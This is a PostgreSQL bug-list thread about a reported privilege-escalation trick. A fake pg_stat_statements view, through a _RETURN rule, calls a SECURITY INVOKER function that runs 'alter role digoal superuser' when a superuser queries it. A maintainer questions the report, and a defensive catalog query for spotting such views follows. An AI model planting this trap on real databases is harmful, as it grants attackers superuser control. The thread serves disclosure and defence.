Re: BUG #13651: trigger security invoker attack

From: "David G(dot) Johnston" <david(dot)g(dot)johnston(at)gmail(dot)com>
To: 德哥 <digoal(at)126(dot)com>
Cc: "pgsql-bugs(at)postgresql(dot)org" <pgsql-bugs(at)postgresql(dot)org>
Subject: Re: BUG #13651: trigger security invoker attack
Date: 2015-09-30 02:22:15
Message-ID: CAKFQuwYVUfXBbmb+hmbY-SVS8D0DemfP2-c+gp-wAnyZy8zNUQ@mail.gmail.com
Lists: pgsql-bugs

And what would be an acceptable solution/behavior in your eyes?

On Tuesday, September 29, 2015, 德哥 <digoal(at)126(dot)com> wrote:

>
> The point is:
> Superusers could possibly be tricked, like with phishing sites.
> For example:
> A DBA, or some monitoring / admin software, queries these tables or views.
>
> --
> Public welfare is a lifelong commitment, I'm Digoal, Just Do It.
>
> On 2015-09-30 10:01:12, "David G. Johnston" <david(dot)g(dot)johnston(at)gmail(dot)com> wrote:
>
> On Tuesday, September 29, 2015, 德哥 <digoal(at)126(dot)com> wrote:
>
>> A normal user gets superuser privilege using a security invoker function.
>> postgres=> create table pg_stat_statements (
>> userid oid ,
>> dbid oid ,
>> queryid bigint ,
>> query text ,
>> calls bigint ,
>> total_time double precision ,
>> rows bigint ,
>> shared_blks_hit bigint ,
>> shared_blks_read bigint ,
>> shared_blks_dirtied bigint ,
>> shared_blks_written bigint ,
>> local_blks_hit bigint ,
>> local_blks_read bigint ,
>> local_blks_dirtied bigint ,
>> local_blks_written bigint ,
>> temp_blks_read bigint ,
>> temp_blks_written bigint ,
>> blk_read_time double precision ,
>> blk_write_time double precision );
>>
>> postgres=> create or replace function f() returns pg_stat_statements as
>> $$
>> declare
>> begin
>> alter role digoal superuser;
>> end;
>> $$ language plpgsql security invoker;
>> CREATE FUNCTION
>>
>> postgres=> create rule "_RETURN" as on select to pg_stat_statements do
>> instead select * from f();
>> CREATE RULE
>>
>> When a superuser selects from the view pg_stat_statements, the normal user
>> digoal will be granted the superuser role.
>>
>> Yes, it's a normal operation, but somebody can use this trick.
>>
>
>
> Everything you just wrote was done as superuser so what's your point?
>
> David J.
>
>
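As an added defender-side check (not part of the thread or of PostgreSQL itself), the catalog query below lists views outside the system schemas whose rewrite rules call functions owned by non-superuser roles. A SECURITY INVOKER function runs with the privileges of whoever queries the view, so a superuser or monitoring role selecting from such a view executes that code with its own rights; this is exactly the `_RETURN` rule on `f()` shown in the quoted message. It assumes standard PostgreSQL 9.x catalogs and a role that can read `pg_catalog`.

```sql
-- Added example: find views whose rule actions depend on functions owned by
-- non-superusers. View dependencies are recorded in pg_depend against the
-- view's rewrite rule (classid = pg_rewrite), with the function as the
-- referenced object (refclassid = pg_proc).
SELECT n.nspname                     AS view_schema,
       c.relname                     AS view_name,
       pg_get_userbyid(c.relowner)   AS view_owner,
       p.proname                     AS called_function,
       pg_get_userbyid(p.proowner)   AS function_owner,
       p.prosecdef                   AS security_definer,   -- false = runs as caller
       l.lanname                     AS language
FROM   pg_depend    d
JOIN   pg_rewrite   r  ON r.oid = d.objid
                      AND d.classid = 'pg_catalog.pg_rewrite'::regclass
JOIN   pg_class     c  ON c.oid = r.ev_class
                      AND c.relkind = 'v'                    -- views only
JOIN   pg_namespace n  ON n.oid = c.relnamespace
JOIN   pg_proc      p  ON p.oid = d.refobjid
                      AND d.refclassid = 'pg_catalog.pg_proc'::regclass
JOIN   pg_language  l  ON l.oid = p.prolang
JOIN   pg_roles     fo ON fo.oid = p.proowner
WHERE  n.nspname NOT IN ('pg_catalog', 'information_schema')
  AND  NOT fo.rolsuper                                       -- function owner is not a superuser
ORDER  BY view_schema, view_name, called_function;
```

Any row whose `view_name` shadows a name that privileged tooling queries unqualified (such as `pg_stat_statements`) deserves a look at `search_path` and at who owns the view; qualifying the schema in monitoring queries and keeping a restrictive `search_path` for superuser sessions removes the lookup ambiguity the trick relies on.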
